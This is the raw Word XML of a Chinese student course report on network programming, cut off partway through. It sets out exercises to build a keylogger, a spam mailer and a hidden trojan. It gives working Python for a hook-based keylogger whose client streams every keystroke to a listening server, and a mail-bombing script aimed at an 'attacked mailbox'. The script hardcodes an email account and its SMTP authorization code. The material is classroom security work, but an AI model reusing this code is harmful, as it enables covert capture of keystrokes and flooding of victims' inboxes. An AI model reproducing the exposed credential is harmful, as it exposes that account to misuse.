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7348" w14:textId="3E4CB882" w:rsidR="001812C9" w:rsidRDefault="00D431C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1812C9">
          <w:headerReference w:type="default" r:id="rId7"/>
          <w:footerReference w:type="default" r:id="rId8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  <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>封面及考核表已删除</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B9E46F" w14:textId="4BB521AC" w:rsidR="003F3D2C" w:rsidRPr="003D427C" w:rsidRDefault="00054118" w:rsidP="003D427C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>实验目的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>和要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EEE765D" w14:textId="6B7FAA60" w:rsidR="003F3D2C" w:rsidRPr="009B55A5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1．目的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3FC43F" w14:textId="77777777" w:rsidR="003F3D2C" w:rsidRPr="009B55A5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（1）加深对计算机网络的基本概念和原理，掌握数据采集与分析的常用方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22588579" w14:textId="77777777" w:rsidR="003F3D2C" w:rsidRPr="009B55A5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（2）提高学生网络应用与编程的能力。学生必须完成三个题目，提高其分析与解决问题的能力，</w:t>
      </w:r>
      <w:r w:rsidRPr="009B55A5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为大型网络编程打下坚实基础</w:t>
      </w:r>
      <w:r w:rsidRPr="009B55A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39052B9B" w14:textId="77777777" w:rsidR="003F3D2C" w:rsidRPr="009B55A5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（3）通过撰写课程设计报告，锻炼学生的逻辑组织和语言表达能力；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16669913" w14:textId="77777777" w:rsidR="003F3D2C" w:rsidRPr="009B55A5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（4）培养学生理论运用于实践的综合应用和设计创新能力。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B377B" w14:textId="35752E58" w:rsidR="003F3D2C" w:rsidRPr="003F3D2C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b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B55A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>2．</w:t>
      </w:r>
      <w:r w:rsidR="009B55A5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E5C51C2" w14:textId="77777777" w:rsidR="003F3D2C" w:rsidRPr="003F3D2C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F3D2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（1）设计完成与网络相关题目的基本功能要求；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B964DA" w14:textId="6D3D2E38" w:rsidR="003F3D2C" w:rsidRPr="003F3D2C" w:rsidRDefault="003F3D2C" w:rsidP="003F3D2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F3D2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（2）调试运行之后，要求边演示边解释设计的思想、过程及采用的方法</w:t>
      </w:r>
      <w:r w:rsidR="00B44035" w:rsidRPr="00037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C06AC0" w14:textId="12B0FB10" w:rsidR="00037501" w:rsidRDefault="003F3D2C" w:rsidP="0003750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F3D2C">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（3）按一定的规范要求，撰写课程设计报告</w:t>
      </w:r>
      <w:r w:rsidR="00DF5FCD" w:rsidRPr="00037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65561CD9" w14:textId="04F68288" w:rsidR="00037501" w:rsidRPr="00037501" w:rsidRDefault="00037501" w:rsidP="0003750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（4）</w:t>
      </w:r>
      <w:r w:rsidRPr="00037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>熟练掌握网络编程技术；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339D97EF" w14:textId="4D9FC54B" w:rsidR="00037501" w:rsidRPr="00037501" w:rsidRDefault="00037501" w:rsidP="0003750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037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（5）掌握漏洞扫描、网络流量的分析方法；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9305E6" w14:textId="7367FD48" w:rsidR="00037501" w:rsidRDefault="00037501" w:rsidP="00CD436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037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00037501">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）掌握各种软件开发工具的使用过程及方法。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776CAA40" w14:textId="77777777" w:rsidR="00A46EA6" w:rsidRPr="00037501" w:rsidRDefault="00A46EA6" w:rsidP="00CD436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20782F6D" w14:textId="77777777" w:rsidR="001812C9" w:rsidRDefault="00054118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实验原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B98AD7C" w14:textId="79612398" w:rsidR="00F32E2A" w:rsidRPr="00F32E2A" w:rsidRDefault="00CB10BD" w:rsidP="0070189F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</w:t>
      </w:r>
      <w:r w:rsidR="00F32E2A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F32E2A" w:rsidRPr="00F32E2A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>键盘记录</w:t>
      </w:r>
      <w:r w:rsidR="005E086D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。使用python编写代码，实现对用户键盘的监控。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1223A6FC" w14:textId="66D051D8" w:rsidR="001812C9" w:rsidRDefault="00CB10BD" w:rsidP="0070189F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</w:t>
      </w:r>
      <w:r w:rsidR="00F32E2A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F32E2A" w:rsidRPr="00F32E2A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发送垃圾邮件</w:t>
      </w:r>
      <w:r w:rsidR="005E086D">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="0070189F" w:rsidRPr="0070189F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>电子邮件是因特网上使用得非常多的一种应用，它可以非常方便的使相隔很远的人进行通信</w:t>
      </w:r>
      <w:r w:rsidR="0070189F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。然而日常生活中我们也会收到很多垃圾邮件，我们可以通过python来编写代码，实现多批次垃圾邮件的发送。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D27A68" w14:textId="264F2C92" w:rsidR="00A46EA6" w:rsidRPr="00F32E2A" w:rsidRDefault="00CB10BD" w:rsidP="006015D4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</w:t>
      </w:r>
      <w:r w:rsidR="00E91013">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.简易木马</w:t>
      </w:r>
      <w:r w:rsidR="002C4990">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="002C4990" w:rsidRPr="002C4990">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通过配置程序隐藏木马，并进行信息反馈，达到入侵网络的目的</w:t>
      </w:r>
      <w:r w:rsidR="006015D4">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB445D2" w14:textId="0CEE4D5C" w:rsidR="001970C8" w:rsidRPr="005C6534" w:rsidRDefault="00054118" w:rsidP="005C6534">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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实验内容及步骤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30568A6F" w14:textId="76563237" w:rsidR="0070189F" w:rsidRDefault="00CB10BD" w:rsidP="0070189F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</w:t>
      </w:r>
      <w:r w:rsidR="0070189F" w:rsidRPr="0070189F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.键盘记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB37C7F" w14:textId="77777777" w:rsid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实验内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="001970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对被监控系统的键盘操作可进行实时的监控，将监视结果发回远程主机进行查看。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBB29DD" w14:textId="4E347684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1970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A、 对被监控主机的键盘及鼠标操作进行监控和记录；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A41D4BC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1970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B、 可通过网络接口将监控的结果发回到远程主机；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38778F12" w14:textId="77777777" w:rsid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1970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>C、 将收到的结果进行有效的实时显示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0B9837" w14:textId="0B882C11" w:rsidR="0070189F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实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020F41F3" w14:textId="217B587F" w:rsid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客户端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BB15EF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# client.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C453257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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A8F624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import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pythoncom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4DF7A84E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import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pyWinhook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="003C1FC5" w14:textId="21D9DF02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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9B8303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client =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socket.socket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socket.AF_INET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socket.SOCK_STREAM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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FDD7A4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host = "127.0.0.1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324696BB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port = 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF2833" w14:textId="3E4D0500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client.connect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((host, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50460AF0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def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onKeyboardEvent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(event):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1E6DEF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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 监听键盘事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6C2E02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client.send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(("\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nKey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 xml:space="preserve">:" +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event.Key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).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2DE7CF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client.send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 xml:space="preserve">(("Time:" +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time.strftime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 xml:space="preserve">("%Y %H:%M:%S",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time.localtime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())).encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3522A506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client.send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("\n------------".encode())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAE39A1" w14:textId="2BC5B076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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE5AE93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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42673C7B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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 创建一个“钩子”管理对象</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8816EC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hm =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pyWinhook.HookManager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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E42637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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 监听所有键盘事件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239AD497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hm.KeyDown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onKeyboardEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="05DA58B6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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 设置键盘“钩子”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489E5E8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hm.HookKeyboard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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5945BA10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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 进入循环，如</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>手动关闭，程序将一直处于监听状态</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FFEE46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pythoncom.PumpMessages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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B7952" w14:textId="5A0F6214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1970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>client.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74EA07FE" w14:textId="77777777" w:rsidR="001970C8" w:rsidRP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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEBF74" w14:textId="48024FB0" w:rsidR="001970C8" w:rsidRDefault="001970C8" w:rsidP="001970C8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1970C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB8013C" w14:textId="48F99B80" w:rsid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24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF4471D" w14:textId="116BA6E4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import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F58FCB3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socketserver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socket.socket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socket.AF_INET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socket.SOCK_STREAM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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E33EB5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HOST = '127.0.0.1'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714E5CA6" w14:textId="69EE2AE1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PORT = 999</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087B8CAC" w14:textId="70EFE076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socketserver.bind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((HOST, PORT))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D04EFF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socketserver.listen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(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00733C12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>print("等待客户端连接……")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD43130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clientsocket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addr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socketserver.accept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()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645244AE" w14:textId="3D831032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>print("已建立连接, 开始数据传输……")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CC82C" w14:textId="6811156B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while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487841C3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recvmsg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clientsocket.recv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(1024)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487FA065" w14:textId="77777777" w:rsidR="00C854F3" w:rsidRPr="00C854F3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strData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recvmsg.decode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("utf-8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402B387A" w14:textId="726FA01B" w:rsidR="00C854F3" w:rsidRPr="001970C8" w:rsidRDefault="00C854F3" w:rsidP="00C854F3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print(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strData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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638EA96" w14:textId="2AB89571" w:rsidR="001812C9" w:rsidRDefault="006A35CD" w:rsidP="0070189F">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:rightChars="-244" w:right="-512" w:firstLine="42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</w:t>
      </w:r>
      <w:r w:rsidR="0070189F" w:rsidRPr="0070189F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="005C6534">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发</w:t>
      </w:r>
      <w:r w:rsidR="0070189F" w:rsidRPr="0070189F">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>送垃圾邮件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC5EF1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实验内容：</w:t>
      </w:r>
      <w:r w:rsidRPr="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>编写程序发送垃圾邮件到被攻击的邮箱。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D715F6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C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>A、 编写程序批量发送邮件到被攻击的邮箱，可设定被攻击的邮箱地址；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5164DDE9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C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>B、 可设定发送的邮件数量；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE333E3" w14:textId="77777777" w:rsid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C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>C、 可设置发送邮件的时间间隔。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ECB59F" w14:textId="064A7DCF" w:rsid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实验步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103E7BD3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from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smtplib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import SMTP_SSL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48210C84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from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email.mime.text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import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MIMEText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7736A810" w14:textId="1BA197A1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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06DA61BB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def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sendMail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(message, Subject,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sender_show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recipient_show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to_addrs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cc_show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=''):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3F66A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填写真实的发邮件服务用户名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70EBD0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user = '2354839133@qq.com'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D138A51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password = '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cdrrbztqusvuebjh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'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AE2AA8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邮件内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A731B8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msg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MIMEText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(message, 'plain', _charset="utf_8")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562B2CA6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邮件主题描述</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515CADC0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msg["Subject"] = Subject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B828998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发件人显示，不起实际作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E58D2D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msg["from"]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sender_show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="46659BB0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收件人显示，不起实际作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43128C73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msg["to"]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recipient_show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39A2E5A1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抄送人显示，不起实际作用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395020C3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msg["Cc"]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cc_show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5205B96C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with SMTP_SSL(host="smtp.qq.com", port=465) as smtp:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A7433E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    # 登陆发邮件服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCB87A6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smtp.login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(user=user, password=password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1FDB3F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    # 实际发送，接收邮件配置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD01CCA" w14:textId="2142A9F2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smtp.sendmail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from_addr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=user,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to_addrs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=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to_addrs.split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(','), msg=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msg.as_string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())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ED5D0E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>if __name__ == '__main__':</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2417BCAD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message = input("输入邮件正文：")     # 邮件正文</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DAE037A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Subject = input("输入邮件主题：")     # 邮件主题</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C835DD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发件人名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C7314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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sender_show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= input("输入发件人名字：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B97FE1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接收人名字</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716B987A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 w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>recipient_show</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= input("输入收件人名字：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C573EF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# 实际发给的接收人</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFD7C26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email_list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[]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2390C653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cs = int(input("输入发送次数："))</w:t>
      </w:r>
